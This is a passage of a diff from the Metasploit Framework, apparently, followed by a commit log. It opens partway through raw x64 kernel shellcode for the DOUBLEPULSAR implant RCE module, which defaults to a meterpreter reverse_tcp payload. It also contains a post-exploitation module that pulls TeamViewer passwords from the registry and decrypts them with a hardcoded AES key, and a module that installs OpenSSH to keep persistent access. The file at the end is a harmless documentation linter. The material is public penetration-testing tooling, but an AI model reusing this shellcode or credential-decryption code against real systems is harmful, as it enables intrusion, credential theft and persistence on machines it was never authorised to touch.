+    "\x8b\x37\x66\x81\xfe\x4d\x5a\x75\xef\x41\xbb\x5c\x72\x11\x62\xe8" \
+    "\x18\x02\x00\x00\x48\x89\xc6\x48\x81\xc6\x08\x03\x00\x00\x41\xbb" \
+    "\x7a\xba\xa3\x30\xe8\x03\x02\x00\x00\x48\x89\xf1\x48\x39\xf0\x77" \
+    "\x11\x48\x8d\x90\x00\x05\x00\x00\x48\x39\xf2\x72\x05\x48\x29\xc6" \
+    "\xeb\x08\x48\x8b\x36\x48\x39\xce\x75\xe2\x49\x89\xf4\x31\xdb\x89" \
+    "\xd9\x83\xc1\x04\x81\xf9\x00\x00\x01\x00\x0f\x8d\x66\x01\x00\x00" \
+    "\x4c\x89\xf2\x89\xcb\x41\xbb\x66\x55\xa2\x4b\xe8\xbc\x01\x00\x00" \
+    "\x85\xc0\x75\xdb\x49\x8b\x0e\x41\xbb\xa3\x6f\x72\x2d\xe8\xaa\x01" \
+    "\x00\x00\x48\x89\xc6\xe8\x50\x01\x00\x00\x41\x81\xf9" +
+    generate_process_hash(proc_name.upcase) +
+    "\x75\xbc\x49\x8b\x1e\x4d\x8d\x6e\x10\x4c\x89\xea\x48\x89\xd9" \
+    "\x41\xbb\xe5\x24\x11\xdc\xe8\x81\x01\x00\x00\x6a\x40\x68\x00\x10" \
+    "\x00\x00\x4d\x8d\x4e\x08\x49\xc7\x01\x00\x10\x00\x00\x4d\x31\xc0" \
+    "\x4c\x89\xf2\x31\xc9\x48\x89\x0a\x48\xf7\xd1\x41\xbb\x4b\xca\x0a" \
+    "\xee\x48\x83\xec\x20\xe8\x52\x01\x00\x00\x85\xc0\x0f\x85\xc8\x00" \
+    "\x00\x00\x49\x8b\x3e\x48\x8d\x35\xe9\x00\x00\x00\x31\xc9\x66\x03" \
+    "\x0d\xd7\x01\x00\x00\x66\x81\xc1\xf9\x00\xf3\xa4\x48\x89\xde\x48" \
+    "\x81\xc6\x08\x03\x00\x00\x48\x89\xf1\x48\x8b\x11\x4c\x29\xe2\x51" \
+    "\x52\x48\x89\xd1\x48\x83\xec\x20\x41\xbb\x26\x40\x36\x9d\xe8\x09" \
+    "\x01\x00\x00\x48\x83\xc4\x20\x5a\x59\x48\x85\xc0\x74\x18\x48\x8b" \
+    "\x80\xc8\x02\x00\x00\x48\x85\xc0\x74\x0c\x48\x83\xc2\x4c\x8b\x02" \
+    "\x0f\xba\xe0\x05\x72\x05\x48\x8b\x09\xeb\xbe\x48\x83\xea\x4c\x49" \
+    "\x89\xd4\x31\xd2\x80\xc2\x90\x31\xc9\x41\xbb\x26\xac\x50\x91\xe8" \
+    "\xc8\x00\x00\x00\x48\x89\xc1\x4c\x8d\x89\x80\x00\x00\x00\x41\xc6" \
+    "\x01\xc3\x4c\x89\xe2\x49\x89\xc4\x4d\x31\xc0\x41\x50\x6a\x01\x49" \
+    "\x8b\x06\x50\x41\x50\x48\x83\xec\x20\x41\xbb\xac\xce\x55\x4b\xe8" \
+    "\x98\x00\x00\x00\x31\xd2\x52\x52\x41\x58\x41\x59\x4c\x89\xe1\x41" \
+    "\xbb\x18\x38\x09\x9e\xe8\x82\x00\x00\x00\x4c\x89\xe9\x41\xbb\x22" \
+    "\xb7\xb3\x7d\xe8\x74\x00\x00\x00\x48\x89\xd9\x41\xbb\x0d\xe2\x4d" \
+    "\x85\xe8\x66\x00\x00\x00\x48\x89\xec\x5d\x5b\x41\x5c\x41\x5d\x41" \
+    "\x5e\x41\x5f\x5e\xc3\xe9\xb5\x00\x00\x00\x4d\x31\xc9\x31\xc0\xac" \
+    "\x41\xc1\xc9\x0d\x3c\x61\x7c\x02\x2c\x20\x41\x01\xc1\x38\xe0\x75" \
+    "\xec\xc3\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \
+    "\x20\x48\x8b\x12\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x45\x31\xc9" \
+    "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1" \
+    "\xe2\xee\x45\x39\xd9\x75\xda\x4c\x8b\x7a\x20\xc3\x4c\x89\xf8\x41" \
+    "\x51\x41\x50\x52\x51\x56\x48\x89\xc2\x8b\x42\x3c\x48\x01\xd0\x8b" \
+    "\x80\x88\x00\x00\x00\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20" \
+    "\x49\x01\xd0\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\xe8\x78\xff" \
+    "\xff\xff\x45\x39\xd9\x75\xec\x58\x44\x8b\x40\x24\x49\x01\xd0\x66" \
+    "\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48" \
+    "\x01\xd0\x5e\x59\x5a\x41\x58\x41\x59\x41\x5b\x41\x53\xff\xe0\x56" \
+    "\x41\x57\x55\x48\x89\xe5\x48\x83\xec\x20\x41\xbb\xda\x16\xaf\x92" \
+    "\xe8\x4d\xff\xff\xff\x31\xc9\x51\x51\x51\x51\x41\x59\x4c\x8d\x05" \
+    "\x1a\x00\x00\x00\x5a\x48\x83\xec\x20\x41\xbb\x46\x45\x1b\x22\xe8" \
+    "\x68\xff\xff\xff\x48\x89\xec\x5d\x41\x5f\x5e\xc3"
+  end
+
+  def kernel_shellcode_size
+    make_kernel_shellcode('').length
+  end
+
+end
@@ -8,20 +8,23 @@ class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::SMB::Client
+  include Msf::Module::Deprecated
+
+  moved_from 'exploit/windows/smb/doublepulsar_rce'

  MAX_SHELLCODE_SIZE = 4096

  def initialize(info = {})
    super(update_info(info,
-      'Name'             => 'DOUBLEPULSAR Payload Execution and Neutralization',
-      'Description'      => %q{
+      'Name'               => 'SMB DOUBLEPULSAR Remote Code Execution',
+      'Description'        => %q{
        This module executes a Metasploit payload against the Equation Group's
        DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.

        While this module primarily performs code execution against the implant,
        the "Neutralize implant" target allows you to disable the implant.
      },
-      'Author'           => [
+      'Author'             => [
        'Equation Group', # DOUBLEPULSAR implant
        'Shadow Brokers', # Equation Group dump
        'zerosum0x0',     # DOPU analysis and detection
@@ -29,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
        'wvu',            # Metasploit module and arch detection
        'Jacob Robles'    # Metasploit module and RCE help
      ],
-      'References'       => [
+      'References'         => [
        ['MSB', 'MS17-010'],
        ['CVE', '2017-0143'],
        ['CVE', '2017-0144'],
@@ -44,32 +47,37 @@ class MetasploitModule < Msf::Exploit::Remote
        ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],
        ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']
      ],
-      'DisclosureDate'   => '2017-04-14', # Shadow Brokers leak
-      'License'          => MSF_LICENSE,
-      'Platform'         => 'win',
-      'Arch'             => ARCH_X64,
-      'Privileged'       => true,
-      'Payload'          => {
-        'Space'          => MAX_SHELLCODE_SIZE - kernel_shellcode_size,
-        'DisableNops'    => true
+      'DisclosureDate'     => '2017-04-14', # Shadow Brokers leak
+      'License'            => MSF_LICENSE,
+      'Platform'           => 'win',
+      'Arch'               => ARCH_X64,
+      'Privileged'         => true,
+      'Payload'            => {
+        'Space'            => MAX_SHELLCODE_SIZE - kernel_shellcode_size,
+        'DisableNops'      => true
      },
-      'Targets'          => [
-        ['Execute payload',    {}],
-        ['Neutralize implant', {}]
+      'Targets'            => [
+        ['Execute payload (x64)',
+          'DefaultOptions' => {
+            'EXITFUNC'     => 'thread',
+            'PAYLOAD'      => 'windows/x64/meterpreter/reverse_tcp'
+          }
+        ],
+        ['Neutralize implant',
+          'DefaultOptions' => {
+            'PAYLOAD'      => nil # XXX: "Unset" generic payload
+          }
+        ]
      ],
-      'DefaultTarget'    => 0,
-      'DefaultOptions'   => {
-        'EXITFUNC'       => 'thread',
-        'PAYLOAD'        => 'windows/x64/meterpreter/reverse_tcp'
-      },
-      'Notes'            => {
-        'AKA'            => ['DOUBLEPULSAR'],
-        'RelatedModules' => [
+      'DefaultTarget'      => 0,
+      'Notes'              => {
+        'AKA'              => ['DOUBLEPULSAR'],
+        'RelatedModules'   => [
          'auxiliary/scanner/smb/smb_ms17_010',
          'exploit/windows/smb/ms17_010_eternalblue'
        ],
-        'Stability'      => [CRASH_OS_DOWN],
-        'Reliability'    => [REPEATABLE_SESSION]
+        'Stability'        => [CRASH_OS_DOWN],
+        'Reliability'      => [REPEATABLE_SESSION]
      }
    ))

@@ -176,7 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
    end

    case target.name
-    when 'Execute payload'
+    when 'Execute payload (x64)'
      unless @xor_key
        fail_with(Failure::NotFound, 'XOR key not found')
      end
@@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# @blurbdust based this code off of https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
+# and https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/enum_ms_product_keys.rb
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+
+  def initialize(info={})
+    super(update_info(info,
+        'Name'          => 'Windows Gather TeamViewer Passwords',
+        'Description'   => %q{ This module will find and decrypt stored TeamViewer passwords },
+        'License'       => MSF_LICENSE,
+        'References'    => [ ['CVE', '2019-18988'], [ 'URL', 'https://whynotsecurity.com/blog/teamviewer/'] ],
+        'Author'        => [ 'Nic Losby <blurbdust[at]gmail.com>' ],
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+      ))
+  end
+
+  def app_list
+    results = ""
+    keys = [
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version8", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version9", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version10", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version11", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version12", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version13", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version14", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version15", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer", "Version" ],
+      [ "HKLM\\SOFTWARE\\TeamViewer\\Temp", "SecurityPasswordExported" ],
+      [ "HKLM\\SOFTWARE\\TeamViewer", "Version" ],
+    ]
+
+    locations = [
+      { :value => 'OptionsPasswordAES', :description => 'Options Password'},
+      { :value => 'SecurityPasswordAES', :description => 'Unattended Password'}, # for < v9.x
+      { :value => 'SecurityPasswordExported', :description => 'Exported Unattended Password'},
+      { :value => 'ServerPasswordAES', :description => 'Backend Server Password'}, # unused according to TeamViewer
+      { :value => 'ProxyPasswordAES', :description => 'Proxy Password'},
+      { :value => 'LicenseKeyAES', :description => 'Perpetual License Key'}, # for <= v14
+    ]
+
+    keys.each do |parent_key, child_key|
+
+      locations.each do |location|
+        secret = registry_getvaldata(parent_key, location[:value])
+        next if secret.nil?
+        plaintext = decrypt(secret)
+        next if plaintext.nil?
+        print_good("Found #{location[:description]}: #{plaintext}")
+        results << "#{location[:description]}: #{plaintext}\n"
+        store_valid_credential(
+          user: nil,
+          private: plaintext,
+          private_type: :password,
+          service_data: {
+            address: session.session_host,
+            last_attempted_at: nil,
+            origin_type: :session,
+            port: 5938, # https://community.teamviewer.com/t5/Knowledge-Base/Which-ports-are-used-by-TeamViewer/ta-p/4139
+            post_reference_name: self.refname,
+            protocol: 'tcp',
+            service_name: 'teamviewer',
+            session_id: session_db_id,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+      end
+    end
+
+    #Only save data to disk when there's something in the table
+    unless results.empty?
+      path = store_loot("host.teamviewer_passwords", "text/plain", session, results, "teamviewer_passwords.txt", "TeamViewer Passwords")
+      print_good("Passwords stored in: #{path.to_s}")
+    end
+  end
+
+  def decrypt(encrypted_data)
+    password = ""
+    return password unless encrypted_data
+
+    password = ""
+
+    key = "\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
+    iv  = "\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"
+    aes = OpenSSL::Cipher.new("AES-128-CBC")
+    begin
+      aes.decrypt
+      aes.key = key
+      aes.iv = iv
+      plaintext = aes.update(encrypted_data)
+      password = Rex::Text.to_ascii(plaintext, 'utf-16le')
+      if plaintext.empty?
+        return nil
+      end
+    rescue OpenSSL::Cipher::CipherError => e
+      print_error("Unable to decrypt the data. Exception: #{e}")
+    end
+
+    password
+  end
+
+  def run
+    print_status("Finding TeamViewer Passwords on #{sysinfo['Computer']}")
+    app_list
+  end
+end
@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Priv
+  include Msf::Post::File
+  include Msf::Post::Windows::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'          => 'Install OpenSSH for Windows',
+                      'Description'   => '
+                        This module installs OpenSSH server and client for Windows using PowerShell.
+                        SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.
+                      ',
+                      'License'       => MSF_LICENSE,
+                      'Author'        => ['Michael Long <bluesentinel[at]protonmail.com>'],
+                      'Arch' => [ARCH_X86, ARCH_X64],
+                      'Platform'      => [ 'win' ],
+                      'SessionTypes'  => [ 'meterpreter', 'shell' ],
+                      'References'	=> [
+                        ['URL', 'https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview'],
+                        ['URL', 'https://github.com/PowerShell/openssh-portable']
+                      ]))
+    register_options(
+      [
+        OptBool.new('INSTALL_SERVER', [true, 'Install OpenSSH.Server for Windows', true]),
+        OptBool.new('INSTALL_CLIENT', [true, 'Install OpenSSH.Client for Windows', true]),
+        OptBool.new('UNINSTALL_SERVER', [true, 'Uninstall OpenSSH.Server for Windows', false]),
+        OptBool.new('UNINSTALL_CLIENT', [true, 'Uninstall OpenSSH.Client for Windows', false]),
+        OptString.new('SERVER_VER', [true, 'OpenSSH.Server version', "OpenSSH.Server~~~~0.0.1.0"]),
+        OptString.new('CLIENT_VER', [true, 'OpenSSH.Client version', "OpenSSH.Client~~~~0.0.1.0"]),
+        OptBool.new('AUTOSTART', [true, 'Sets sshd service to startup automatically at system boot for persistence', true])
+      ]
+    )
+  end
+
+  def run
+    # check admin privileges
+    unless is_system? || is_admin?
+      fail_with(Failure::NotVulnerable, "Insufficient privileges to install or remove OpenSSH")
+    end
+
+    # check if PowerShell is available
+    psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"
+    if !file? "%WINDIR%\\System32#{psh_path}"
+      fail_with(Failure::NotVulnerable, "No powershell available.")
+    end
+
+    # uninstall OpenSSH.Server
+    if datastore['UNINSTALL_SERVER']
+      print_status("Uninstalling OpenSSH.Server")
+      uninstall_ssh_server
+    end
+
+    # unintall OpenSSH.Client
+    if datastore['UNINSTALL_CLIENT']
+      print_status("Uninstalling OpenSSH.Client")
+      uninstall_ssh_client
+    end
+
+    # install OpenSSH.Server
+    if datastore['INSTALL_SERVER']
+      print_status("Installing OpenSSH.Server")
+      install_ssh_server
+    end
+
+    # install OpenSSH.Client
+    if datastore['INSTALL_CLIENT']
+      print_status("Installing OpenSSH.Client")
+      install_ssh_client
+    end
+  end
+
+  def install_ssh_server
+    script = "Add-WindowsCapability -Online -Name #{datastore['SERVER_VER']}; "
+    script << "Start-Service sshd; "
+    if datastore['AUTOSTART']
+      script << "Set-Service -Name sshd -StartupType 'Automatic'"
+    end
+    psh_exec(script)
+  end
+
+  def install_ssh_client
+    script = "Add-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}; "
+    psh_exec(script)
+  end
+
+  def uninstall_ssh_server
+    script = "Stop-Service sshd; "
+    script << "Remove-WindowsCapability -Online -Name #{datastore['SERVER_VER']}"
+    psh_exec(script)
+  end
+
+  def uninstall_ssh_client
+    script = "Remove-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}"
+    psh_exec(script)
+  end
+end
@@ -0,0 +1,294 @@
+#!/usr/bin/env ruby
+# -*- coding: binary -*-
+
+#
+# Check (recursively) for style compliance violations and other
+# tree inconsistencies.
+#
+# by h00die
+#
+
+require 'fileutils'
+require 'find'
+require 'time'
+
+class String
+  def red
+    "\e[1;31;40m#{self}\e[0m"
+  end
+
+  def yellow
+    "\e[1;33;40m#{self}\e[0m"
+  end
+
+  def green
+    "\e[1;32;40m#{self}\e[0m"
+  end
+
+  def cyan
+    "\e[1;36;40m#{self}\e[0m"
+  end
+end
+
+class MsftidyDoc
+
+  # Status codes
+  OK       = 0
+  WARNING  = 1
+  ERROR    = 2
+
+  # Some compiles regexes
+  REGEX_MSF_EXPLOIT = / \< Msf::Exploit/
+  REGEX_IS_BLANK_OR_END = /^\s*end\s*$/
+
+  attr_reader :full_filepath, :source, :stat, :name, :status
+
+  def initialize(source_file)
+    @full_filepath = source_file
+    @module_type = File.dirname(File.expand_path(@full_filepath))[/\/modules\/([^\/]+)/, 1]
+    @source  = load_file(source_file)
+    @lines   = @source.lines # returns an enumerator
+    @status  = OK
+    @name    = File.basename(source_file)
+  end
+
+  public
+
+  #
+  # Display a warning message, given some text and a number. Warnings
+  # are usually style issues that may be okay for people who aren't core
+  # Framework developers.
+  #
+  # @return status [Integer] Returns WARNINGS unless we already have an
+  # error.
+  def warn(txt, line=0) line_msg = (line>0) ? ":#{line}" : ''
+    puts "#{@full_filepath}#{line_msg} - [#{'WARNING'.yellow}] #{cleanup_text(txt)}"
+    @status = WARNING if @status < WARNING
+  end
+
+  #
+  # Display an error message, given some text and a number. Errors
+  # can break things or are so egregiously bad, style-wise, that they
+  # really ought to be fixed.
+  #
+  # @return status [Integer] Returns ERRORS
+  def error(txt, line=0)
+    line_msg = (line>0) ? ":#{line}" : ''
+    puts "#{@full_filepath}#{line_msg} - [#{'ERROR'.red}] #{cleanup_text(txt)}"
+    @status = ERROR if @status < ERROR
+  end
+
+  # Currently unused, but some day msftidy will fix errors for you.
+  def fixed(txt, line=0)
+    line_msg = (line>0) ? ":#{line}" : ''
+    puts "#{@full_filepath}#{line_msg} - [#{'FIXED'.green}] #{cleanup_text(txt)}"
+  end
+
+  #
+  # Display an info message. Info messages do not alter the exit status.
+  #
+  def info(txt, line=0)
+    return if SUPPRESS_INFO_MESSAGES
+    line_msg = (line>0) ? ":#{line}" : ''
+    puts "#{@full_filepath}#{line_msg} - [#{'INFO'.cyan}] #{cleanup_text(txt)}"
+  end
+
+  ##
+  #
+  # The functions below are actually the ones checking the source code
+  #
+  ##
+
+  def has_module
+    module_filepath = @full_filepath.sub('documentation/','').sub('/exploit/', '/exploits/')
+    found = false
+    ['.rb', '.py', '.go'].each do |ext|
+      if File.file? module_filepath.sub(/.md$/, ext)
+        found = true
+        break
+      end
+    end
+    unless found
+      error("Doc missing module.  Check file name and path(s) are correct. Doc: #{@full_filepath}")
+    end
+  end
+
+  def check_start_with_vuln_app
+    unless @lines.first =~ /^## Vulnerable Application$/
+      warn('Docs should start with ## Vulnerable Application')
+    end 
+  end
+
+  def has_h2_headings
+    has_vulnerable_application = false
+    has_verification_steps = false
+    has_scenarios = false
+    has_options = false
+    has_bad_description = false
+    has_bad_intro = false
+
+    @lines.each do |line|
+      if line =~ /^## Vulnerable Application$/
+        has_vulnerable_application = true
+        next
+      end
+
+      if line =~ /^## Verification Steps$/
+        has_verification_steps = true
+        next
+      end
+
+      if line =~ /^## Scenarios$/
+        has_scenarios = true
+        next
+      end
+
+      if line =~ /^## Options$/
+        has_options = true
+        next
+      end
+
+      if line =~ /^## Description$/
+        has_bad_description = true
+        next
+      end
+
+      if line =~ /^## (Intro|Introduction)$/
+        has_bad_intro = true
+        next
+      end
+    end
+
+    unless has_vulnerable_application
+      warn('Missing Section: ## Vulnerable Application')
+    end
+
+    unless has_verification_steps
+      warn('Missing Section: ## Verification Steps')
+    end
+
+    unless has_scenarios
+      warn('Missing Section: ## Scenarios')
+    end
+
+    unless has_options
+      warn('Missing Section: ## Options')
+    end
+
+    if has_bad_description
+      warn('Descriptions should be within Vulnerable Application, or an H3 sub-section of Vulnerable Application')
+    end
+
+    if has_bad_intro
+      warn('Intro/Introduction should be within Vulnerable Application, or an H3 sub-section of Vulnerable Application')
+    end
+  end
+
+  def check_newline_eof
+    if @source !~ /(?:\r\n|\n)\z/m
+      warn('Please add a newline at the end of the file')
+    end
+  end
+
+  # This checks that the H2 headings are in teh right order.
+  def h2_order
+    unless @source =~ /^## Vulnerable Application$.+^## Verification Steps$.+^## Options$.+^## Scenarios$/m
+      warn('H2 headings in incorrect order.  Should be: Vulnerable Application, Verification Steps, Options, Scenarios')
+    end
+  end
+
+  def line_checks
+    idx = 0
+    in_codeblock = false
+
+    @lines.each do |ln|
+      idx += 1
+
+      if ln.scan(/```/).length.odd?
+        in_codeblock = !in_codeblock
+      end
+
+      # find spaces at EOL not in a code block which is ``` or starts with four spaces
+      if !in_codeblock && ln =~ /[ \t]$/ && !(ln =~ /^    /)
+        warn("Spaces at EOL", idx)
+      end
+
+      if ln =~ /^# /
+        warn("No H1 (#) headers.  If this is code, indent.", idx)
+      end
+
+      l = 140
+      if ln.length > l && !in_codeblock
+        warn("Line too long (#{ln.length}).  Consider a newline (which resolves to a space in markdown) to break it up around #{l} characters.", idx)
+      end
+
+    end
+  end
+
+  #
+  # Run all the msftidy checks.
+  #
+  def run_checks
+    has_module
+    check_start_with_vuln_app
+    has_h2_headings
+    check_newline_eof
+    h2_order
+    line_checks
+  end
+
+  private
+
+  def load_file(file)
+    f = open(file, 'rb')
+    @stat = f.stat
+    buf = f.read(@stat.size)
+    f.close
+    return buf
+  end
+
+  def cleanup_text(txt)
+    # remove line breaks
+    txt = txt.gsub(/[\r\n]/, ' ')
+    # replace multiple spaces by one space
+    txt.gsub(/\s{2,}/, ' ')
+  end
+end
+
+##
+#
+# Main program
+#
+##
+
+if __FILE__ == $PROGRAM_NAME
+  dirs = ARGV
+
+  @exit_status = 0
+
+  if dirs.length < 1
+    $stderr.puts "Usage: #{File.basename(__FILE__)} <directory or file>"
+    @exit_status = 1
+    exit(@exit_status)
+  end
+
+  dirs.each do |dir|
+    begin
+      Find.find(dir) do |full_filepath|
+        next if full_filepath =~ /\.git[\x5c\x2f]/
+        next unless File.file? full_filepath
+        next unless File.extname(full_filepath) == '.md'
+        msftidy = MsftidyDoc.new(full_filepath)
+        # Executable files are now assumed to be external modules
+        # but also check for some content to be sure
+        next if File.executable?(full_filepath) && msftidy.source =~ /require ["']metasploit["']/
+        msftidy.run_checks
+        @exit_status = msftidy.status if (msftidy.status > @exit_status.to_i)
+      end
+    rescue Errno::ENOENT
+      $stderr.puts "#{File.basename(__FILE__)}: #{dir}: No such file or directory"
+    end
+  end
+
+  exit(@exit_status.to_i)
+end
Author	SHA1	Message	Date
Metasploit	70d365f6c9	automatic module_metadata_base.json update	2020-02-13 09:58:47 -06:00
dwelch-r7	07954c0ce2	Land #12902 , Add exploit module for crosschex buffer overflow	2020-02-13 15:48:10 +00:00
dwelch-r7	0e55e20c9c	Land #12902 , Add exploit module for crosschex buffer overflow	2020-02-13 15:43:38 +00:00
Adam Galway	2ca2b5c7bb	replaces magic numbers with target fields	2020-02-13 14:17:23 +00:00
dwelch-r7	556ad5f3b7	Land #12927 , fix getsockname usage in the SOCKS5 server	2020-02-12 12:30:19 +00:00
Adam Galway	cbcf8a2a68	adds to_i and removes default options	2020-02-12 12:04:15 +00:00
Spencer McIntyre	d829f2ab43	Fix getsockname usage in the SOCKS5 server	2020-02-11 21:53:36 -06:00
Adam Galway	8fd3b483d3	improves option descriptions & timeout handling	2020-02-11 15:05:24 +00:00
Adam Galway	946e244c8c	Updates docs and adds basic options	2020-02-11 13:40:51 +00:00
Adam Galway	a7a80e08a8	Updated docs with platform info	2020-02-11 12:55:07 +00:00
Adam Galway	3395b91c83	adds module documentation	2020-02-10 16:45:44 +00:00
Metasploit	d7f92a932e	automatic module_metadata_base.json update	2020-02-10 05:42:10 -06:00
Adam Galway	65521270ea	Land #12853 , InfiniteWP exploit & mixin upgrades	2020-02-10 11:33:49 +00:00
William Vu	eab1245eef	Update module doc	2020-02-07 12:30:00 -06:00
William Vu	a9ae212b27	Replace ForceExploit with AutoCheck mixin	2020-02-07 12:04:57 -06:00
wvu-r7	2ad8a02fd7	Fix version check Co-Authored-By: adamgalway-r7 <54621924+adamgalway-r7@users.noreply.github.com>	2020-02-07 10:10:28 -06:00
Metasploit	44030bd784	automatic module_metadata_base.json update	2020-02-07 09:33:38 -06:00
Spencer McIntyre	6557cabd65	Land #12900 , add teamviewer password recovery	2020-02-07 10:24:12 -05:00
Spencer McIntyre	5a62630309	Add installation steps to the module docs	2020-02-07 10:20:17 -05:00
Spencer McIntyre	cbf0d14666	Fix the store_valid_credentials service info	2020-02-07 10:07:41 -05:00
Metasploit	7472a18493	automatic module_metadata_base.json update	2020-02-07 06:45:35 -06:00
Adam Galway	b01f02480f	Land #12912 , removes and aliases jtr modules	2020-02-07 12:38:26 +00:00
Metasploit	10b49979d4	automatic module_metadata_base.json update	2020-02-07 05:54:21 -06:00
Alan Foster	4dcb2fbd96	Land #12889 , Add OpenSMTPD MAIL FROM RCE	2020-02-07 11:43:18 +00:00
William Vu	763dbf5d5d	Check WordPress version	2020-02-07 03:14:17 -06:00
William Vu	6c59d7c37c	Refactor module	2020-02-07 01:38:11 -06:00
William Vu	3b258eeb19	Refactor plugin editing	2020-02-07 01:10:42 -06:00
blurbdust	a5a5ea7ded	clean up code, update documentation	2020-02-06 22:27:47 -06:00
wvu-r7	6b48337f3d	Land #12917 , chmod +x tools/dev/msftidy_docs.rb	2020-02-06 19:48:55 -06:00
William Vu	793d5c3342	chmod +x tools/dev/msftidy_docs.rb `a099481f66` failed to do so.	2020-02-06 19:21:07 -06:00
William Vu	8c07e17912	Update module docs	2020-02-06 15:57:54 -06:00
William Vu	3282ec5c55	Change vprint_status to print_status in mixin	2020-02-06 15:43:45 -06:00
Metasploit	374396e7fe	automatic module_metadata_base.json update	2020-02-06 15:30:19 -06:00
bwatters-r7	7f3c0c9314	Land #12906 , Add module for CVE-2019-19363 Merge branch 'land-12906' into upstream-master	2020-02-06 15:22:17 -06:00
William Vu	68565f575f	Update module doc	2020-02-06 14:55:41 -06:00
Shelby Pace	9a8d9c6c88	check arch	2020-02-06 14:11:42 -06:00
Shelby Pace	e736588795	change method of exploitation for reliability This commit changes a few things: 1. The module first writes the dll to a temp location. 2. The module writes a batch file to a temp location. 3. The batch file copies the dll until the copy command fails (presumably because the dll is now in use by PrintIsolationHost.exe). 4. The dropped files are deleted. 5. Docs updated to reflect changes.	2020-02-06 12:51:36 -06:00
Metasploit	ab32336544	Bump version of framework to 5.0.74	2020-02-06 12:06:53 -06:00
William Vu	62c98710ad	Reword vulnerable commit range	2020-02-06 11:03:20 -06:00
Jeffrey Martin	208e59999a	Allow multiple `moved_from` deprecations	2020-02-06 10:31:59 -06:00
Jeffrey Martin	abd2c3e1fc	adjust `moved_from` calls to original module names	2020-02-06 10:23:53 -06:00
Adam Cammack	995c56098d	Allow multiple `moved_from` deprecations Each `moved_from` deprecation in a module with more that one will now print their respective warnings.	2020-02-06 10:23:32 -06:00
William Vu	e053ed7a1e	Add Msf::Exploit::Expect mixin and refactor again	2020-02-05 21:16:24 -06:00
William Vu	95fa8602bc	Refactor modules that use Expect	2020-02-05 21:16:21 -06:00
William Vu	b98c0c6876	Add module doc	2020-02-05 17:01:58 -06:00
William Vu	81f9fc7608	Refactor arbitrary payload support	2020-02-05 17:01:54 -06:00
Jeffrey Martin	2bb91a2262	remove jtr specific modules that are refactored	2020-02-05 16:52:19 -06:00
William Vu	dae06ab0c9	Reword comments in morris_sendmail_debug Not sure why I used singular, but it was probably reading too much RFC.	2020-02-05 14:23:29 -06:00
Metasploit	d30b6b136a	automatic module_metadata_base.json update	2020-02-05 13:28:22 -06:00
Shelby Pace	a154efa250	Land #12887 , add dlink ssdpcgi cmd inject	2020-02-05 13:19:05 -06:00
Shelby Pace	691a18c997	move docs file, add options	2020-02-05 12:58:46 -06:00
Metasploit	aad0ab3716	automatic module_metadata_base.json update	2020-02-05 12:50:53 -06:00
bwatters-r7	9db6b5184b	Land #12894 , Add Windscribe WindscribeService Named Pipe Privilege Escalation Merge branch 'land-12894' into upstream-master	2020-02-05 12:37:34 -06:00
Adam Galway	ddec8a58a1	disables payload padding and describes shell code	2020-02-05 18:09:39 +00:00
William Vu	abdcb67189	Merge remote-tracking branch 'origin/pr/20' into feature/opensmtpd	2020-02-05 11:18:06 -06:00
s1kr10s	de25920f30	The written word "through" is modified	2020-02-05 11:53:51 -03:00
s1kr10s	25c23073c8	Modify disclosure URL, remove printf... ... as stager flavor and silence msftidy error.	2020-02-04 15:20:57 -03:00
tperry-r7	c7b07db88b	Land #12904 clean up contributor guide Land #12904 clean up contributor guide	2020-02-04 11:35:23 -06:00
